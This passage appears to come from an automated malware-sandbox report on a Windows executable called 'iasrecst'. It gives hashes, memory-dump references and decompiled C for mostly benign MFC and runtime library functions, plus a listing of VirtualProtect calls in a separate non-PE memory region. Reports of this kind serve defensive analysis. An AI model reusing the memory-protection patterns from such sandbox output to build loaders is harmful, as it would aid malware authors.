Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
Instruction ID: 476433383503efba52e9924e6e49c42754f463986d7ec7af0d6b2631c1f39b91
Opcode Fuzzy Hash: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
Instruction Fuzzy Hash: 6FF0F672644320BFD2115B94BC04B6B7F74DF82721F46401BB94857250C6AC9D91CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00422D9C, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00422D9C(struct tagRECT* _a8) {
				signed int _t11;
				int _t13;
				intOrPtr _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t23;

				if( *0x439c44 != 0) {
					return E004136A7(_t18);
				}
				_t20 = E00416528(_t18);
				if((_t20 & 0x00040600) == 0) {
					_push( ~(GetSystemMetrics(6)));
					_push(5);
				} else {
					_push( ~(GetSystemMetrics(0x21)));
					_push(0x20);
				}
				_t11 = GetSystemMetrics();
				_t23 = _a8;
				_t13 = InflateRect(_t23,  ~_t11, ??);
				if((_t20 & 0x00c00000) != 0) {
					_t14 =  *0x439c9c; // 0x0
					_t23->top = _t23->top + _t14;
					return _t14;
				}
				return _t13;
			}

APIs

GetSystemMetrics.USER32 ref: 00422DC5
GetSystemMetrics.USER32 ref: 00422DDD
InflateRect.USER32(?,00000000), ref: 00422DE7

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsSystem$InflateRect
String ID:
API String ID: 437325472-0
Opcode ID: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
Instruction ID: 4fb92264d37d23bc1c26475d3dc17a881ebb7d940131a89487b38c95dcd350b0
Opcode Fuzzy Hash: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
Instruction Fuzzy Hash: DBF02E32740334BFE221ABA4BD00B7B3355DF40B14F56002BF909A7284CBE86C418BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A843, Relevance: 6.0, APIs: 4, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A843(struct HWND__* _a4, CHAR* _a8) {
				char _v260;
				int _t14;
				int _t15;

				_t15 = lstrlenA(_a8);
				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
					L3:
					return SetWindowTextA(_a4, _a8);
				}
				_t14 = lstrcmpA( &_v260, _a8);
				if(_t14 != 0) {
					goto L3;
				}
				return _t14;
			}

0x0041a856
0x0041a85f
0x0041a88a
0x00000000
0x0041a890
0x0041a880
0x0041a888
0x00000000
0x00000000
0x0041a898

APIs

lstrlenA.KERNEL32(?,00000800), ref: 0041A850
GetWindowTextA.USER32 ref: 0041A86C
lstrcmpA.KERNEL32(?,?), ref: 0041A880
SetWindowTextA.USER32(00000104,?), ref: 0041A890

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
Instruction ID: c3fc7a8564519c1884d43f76098dd6529aba3a828980642d919d20382e6303d7
Opcode Fuzzy Hash: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
Instruction Fuzzy Hash: FFF05831600018ABCF32AF24DC08ADEBB6CFB18391F048172FC5AD1160D775CAA6CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00420031, Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420031(void* __ecx, void* __eflags) {
				signed int _t9;
				int _t10;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t13 = __ecx;
				E0042007A(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E00413740(_t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t9 =  *(_t13 + 0x84);
				_t14 = _t13 + 0x84;
				if(_t9 != 0) {
					_t10 = ReleaseDC( *(_t12 + 0x1c),  *(_t9 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t10;
				}
				return _t9;
			}

0x00420033
0x00420037
0x0042003c
0x00420050
0x00420052
0x00420058
0x0042005e
0x00420066
0x0042006e
0x00420074
0x00000000
0x00420074
0x00420079

APIs

Part of subcall function 0042007A: GetStockObject.GDI32(00000000), ref: 00420090
Part of subcall function 0042007A: InflateRect.USER32(?,000000FF,000000FF), ref: 00420134

ReleaseCapture.USER32(00000001,74ECA0A0,?,00420430,00000000), ref: 0042003C
GetDesktopWindow.USER32 ref: 00420042
LockWindowUpdate.USER32(00000000,00000000,?,00420430,00000000), ref: 00420052
ReleaseDC.USER32 ref: 0042006E

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
Instruction ID: aa72cfc852c6b525c97a93d2fef73d5ebb0a3ecfc5ad3a3ec9de28fd496f1bdc
Opcode Fuzzy Hash: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
Instruction Fuzzy Hash: D0E0D8313003119BE7206B71FC0DB557BA4FF40791F494035F944C61B1CB78A842CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406D64, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406D64(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x43b640,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0040A040(1,  &_v280, 0x100,  &_v1304,  *0x43b640,  *0x43b864, 0);
						E00409DEA( *0x43b864, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x43b640, 0);
						E00409DEA( *0x43b864, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x43b640, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x43b660) =  *(_t55 + 0x43b660) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x43b660) = _t77;
								goto L16;
							}
							 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x43b660) =  *(_t43 + 0x43b660) & 0x00000000;
						} else {
							 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x43b660) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 00406D78

Strings

, xrefs: 00406DC1
, xrefs: 00406D9D

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
Instruction ID: 0991ebd0fa5129877e21a5118ab4003fa57d8a1e05bbe212390e33009e0f709d
Opcode Fuzzy Hash: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
Instruction Fuzzy Hash: 6B4137311042AC5AEB119B14CD4ABEB3B99DB12704F1914F6D28AE61E3C3394964C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 00414354, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414354(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t27;
				void* _t36;
				intOrPtr _t40;
				struct HINSTANCE__* _t46;
				CHAR* _t50;

				E00425FC6(1);
				E004067EC(0, 0);
				_push(0);
				_t50 = E004249C4() + 0x58;
				_t27 = E00424BFB();
				_t40 = _a8;
				_t46 =  *(_t27 + 8);
				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {
					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);
				} else {
					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);
				}
				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_push( &_v44);
					_v44.hInstance = _t46;
					_v44.hCursor = _t40;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t50;
					_t36 = E004142C3();
					_t65 = _t36;
					if(_t36 == 0) {
						E0041A6C8(_t65);
					}
				}
				return _t50;
			}

APIs

Part of subcall function 00425FC6: LeaveCriticalSection.KERNEL32(?,00425D5F,00000010,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425FDE

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

wsprintfA.USER32 ref: 0041439A
wsprintfA.USER32 ref: 004143B6
GetClassInfoA.USER32 ref: 004143C5

Strings

Afx:%x:%x, xrefs: 00414394

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
String ID: Afx:%x:%x
API String ID: 2529146597-2071556601
Opcode ID: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
Instruction ID: 12ef8f29c3e1d770b63201246022492823754bba1a77f7a68e39ab1c72f0dc03
Opcode Fuzzy Hash: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
Instruction Fuzzy Hash: 99113370B002199FDB10EFA5D8819DF7BB8EF48354B54402BF914E3241E3789A918BA9

Uniqueness

Uniqueness Score: -1.00%

Function 02282430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02282468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 022824B2

Strings

@, xrefs: 02282453

Memory Dump Source

Source File: 00000001.00000002.496560392.0000000002281000.00000020.00000001.sdmp, Offset: 02281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2281000_iasrecst.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: dbb71e342ab0d4a1c2725b550ebbd575fce4baa2a7ced6d017dfecd31c056bbd
Instruction ID: bc322eb4d0223980b0f53e2acd143acb63fa99636bb16e5dc5b11f64c92735a2
Opcode Fuzzy Hash: dbb71e342ab0d4a1c2725b550ebbd575fce4baa2a7ced6d017dfecd31c056bbd
Instruction Fuzzy Hash: 5B21F8B4D11249EFDB04DFD4C884BAEBBB5BF44304F208689D906A7284C374EA40DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0CD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E0040E0CD(intOrPtr __ecx) {
				void* _t30;
				void* _t33;

				E00406520(E0042AD9C, _t30);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
				E0040F44C(__ecx, _t33, _t30 - 0x10);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
				E00401AE0(__ecx + 0xc, 0);
				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
				 *((intOrPtr*)(__ecx)) = 0x42f884;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return __ecx;
			}

0x0040e0d2
0x0040e0d7
0x0040e0d8
0x0040e0e2
0x0040e0e5
0x0040e0ec
0x0040e0f4
0x0040e101
0x0040e103
0x0040e113
0x0040e11b
0x0040e126
0x0040e12e

APIs

__EH_prolog.LIBCMT ref: 0040E0D2

Strings

string too long, xrefs: 0040E0DA
(B, xrefs: 0040E0E5

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: H_prolog
String ID: (B$string too long
API String ID: 3519838083-213930478
Opcode ID: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
Instruction ID: 0881663991a763b1776dc7e615562ac6718b0cdd44e68c2937c70cca8b3e00b0
Opcode Fuzzy Hash: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
Instruction Fuzzy Hash: 37F0C272700255AFCB14DB45DC41BAEF7B8EB84344F40403FF501A7281C7B86908C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E516, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040E516(intOrPtr __ecx, void* __eflags) {
				void* _t30;

				E00406520(E0042AE28, _t30);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
				E0040F44C(__ecx, __eflags, _t30 - 0x10);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
				E00401AE0(__ecx + 0xc, 0);
				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
				 *((intOrPtr*)(__ecx)) = 0x42f908;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return __ecx;
			}

0x0040e51b
0x0040e520
0x0040e521
0x0040e52b
0x0040e52e
0x0040e535
0x0040e53d
0x0040e54a
0x0040e54c
0x0040e55c
0x0040e564
0x0040e56f
0x0040e577

APIs

__EH_prolog.LIBCMT ref: 0040E51B

Strings

ios::failbit set, xrefs: 0040E523
(B, xrefs: 0040E52E

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: H_prolog
String ID: (B$ios::failbit set
API String ID: 3519838083-3284000329
Opcode ID: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
Instruction ID: 4fe0a7923be2234898ba92f5c38d2ffc42e0a3632a550d53740f74c2571e9ed9
Opcode Fuzzy Hash: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
Instruction Fuzzy Hash: 51F06272701215AFD7149B55D841BAEBBB8EB85744F40443FF511B7281C7B8690887A9

Uniqueness

Uniqueness Score: -1.00%

Function 00404EAA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404EAA(char _a4, signed int _a8) {
				intOrPtr* _t18;

				if(E00404DD2() == 0) {
					if((_a8 & 0x00000003) != 0) {
						L8:
						return 0x12340042;
					}
					_t6 =  &_a4; // 0x404f63
					_t18 =  *_t6;
					if( *((intOrPtr*)(_t18 + 8)) <= 0 ||  *((intOrPtr*)(_t18 + 0xc)) <= 0 ||  *_t18 >= GetSystemMetrics(0) ||  *((intOrPtr*)(_t18 + 4)) >= GetSystemMetrics(1)) {
						return 0;
					} else {
						goto L8;
					}
				}
				return  *0x439610(_a4, _a8);
			}

0x00404eb3
0x00404eca
0x00404ef6
0x00000000
0x00404ef6
0x00404ecc
0x00404ecc
0x00404ed5
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ed5
0x00000000

APIs

GetSystemMetrics.USER32 ref: 00404EE3
GetSystemMetrics.USER32 ref: 00404EEB

Strings

cO@, xrefs: 00404ECC

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsSystem
String ID: cO@
API String ID: 4116985748-3035479601
Opcode ID: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
Instruction ID: ce698e49c9a3c3113b24397bbaff0b3bfb960c4a55519e17048666b9bd17cfe1
Opcode Fuzzy Hash: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
Instruction Fuzzy Hash: 6AF03071104352DBC7219A35D804527B7D0BBC4355F008C7EE795A65D1D738D882EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E073, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E0040E073(void* __eflags) {
				intOrPtr* _t42;
				intOrPtr* _t52;
				void* _t54;
				signed int _t60;

				E00406520(E0042AD88, _t54);
				 *((char*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 - 0xd));
				E00401AE0(_t54 - 0x20, 0);
				E00401B90(_t54 - 0x20, "string too long", E00405A40("string too long"));
				_t5 = _t54 - 4;
				 *_t5 =  *(_t54 - 4) & 0x00000000;
				_t60 =  *_t5;
				_push(_t54 - 0x20);
				_t42 = _t54 - 0x3c;
				L1();
				 *((intOrPtr*)(_t54 - 0x3c)) = 0x42f864;
				E004067EC(_t54 - 0x3c, 0x4336b8);
				_pop(_t51);
				E00406520(E0042AD9C, _t54);
				_push(_t42);
				_push(_t42);
				_t52 = _t42;
				 *((intOrPtr*)(_t54 - 0x14)) = _t52;
				 *((intOrPtr*)(_t54 - 0x10)) = 0x42e428;
				E0040F44C(_t42, _t60, _t54 - 0x10);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				 *((char*)(_t52 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8))));
				E00401AE0(_t52 + 0xc, 0);
				E00402320(_t52 + 0xc,  *((intOrPtr*)(_t54 + 8)), 0,  *0x42b7d8);
				 *_t52 = 0x42f884;
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t52;
			}

APIs

__EH_prolog.LIBCMT ref: 0040E078

Part of subcall function 0040E0CD: __EH_prolog.LIBCMT ref: 0040E0D2

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

Strings

ios::failbit set, xrefs: 0040E083
string too long, xrefs: 0040E091, 0040E096, 0040E09E

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID: ios::failbit set$string too long
API String ID: 2062786585-1331328489
Opcode ID: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
Instruction ID: 323c5a97231c9e7e2180db571d543564ba768becdaa7b618deba2c25bb2dd9de
Opcode Fuzzy Hash: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
Instruction Fuzzy Hash: 68F03A62D111286ACB04F6E6EC42AEEBB7CAF08345F40407AF411B6092DB785608CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425BA0, Relevance: 5.1, APIs: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00425BA0(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t29;
				intOrPtr _t32;
				long* _t37;
				intOrPtr* _t42;
				signed int _t45;
				struct _CRITICAL_SECTION* _t46;
				intOrPtr* _t49;

				_push(__ecx);
				_t49 = _a4;
				_t37 = __ecx;
				_t45 = 1;
				_v8 = _t45;
				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
					L10:
					_t46 =  &(_t37[7]);
					EnterCriticalSection(_t46);
					E0042581A( &(_t37[5]), _t49);
					LeaveCriticalSection(_t46);
					LocalFree( *(_t49 + 0xc));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49))(1);
					}
					_t29 = TlsSetValue( *_t37, 0);
					L13:
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
						if(_t42 != 0) {
							 *((intOrPtr*)( *_t42))(1);
						}
						_t29 =  *(_t49 + 0xc);
						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
					} else {
						_t29 =  *(_t49 + 0xc);
						if( *(_t29 + _t45 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t45 = _t45 + 1;
				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
				if(_v8 == 0) {
					goto L13;
				}
				goto L10;
			}

APIs

EnterCriticalSection.KERNEL32(?), ref: 00425BFD
LeaveCriticalSection.KERNEL32(?,?), ref: 00425C0D
LocalFree.KERNEL32(?), ref: 00425C16
TlsSetValue.KERNEL32(?,00000000), ref: 00425C2C

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
Instruction ID: 2aca870bf4ceec97ac406f80c089e65d4ca4c841141b20e4fc51915e0dfd648f
Opcode Fuzzy Hash: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
Instruction Fuzzy Hash: BA21AC31305724EFC7249F45E888B6A7BA4FF40712F9080AEE5428B2A1D7B8F841CB64

Uniqueness

Uniqueness Score: -1.00%

